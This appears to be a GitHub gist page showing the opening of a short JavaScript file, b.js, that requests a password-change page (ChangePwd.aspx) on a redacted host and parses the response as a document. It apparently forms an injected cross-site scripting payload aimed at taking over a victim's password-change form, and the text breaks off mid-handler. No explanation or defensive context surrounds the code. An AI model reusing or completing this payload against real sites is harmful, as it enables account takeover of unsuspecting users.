Skip to content

Instantly share code, notes, and snippets.

@adon90
adon90 / b.js
Last active March 1, 2022 16:00
var x = new XMLHttpRequest();
var r=0;
x.open('GET','https:/XXXXXXX/AgirhNet/StaticWebForm/Outils/ChangePwd.aspx');
x.responseType = "document";
x.send(null);
x.onreadystatechange = function() {
if (x.readyState === 4 && r != 1) {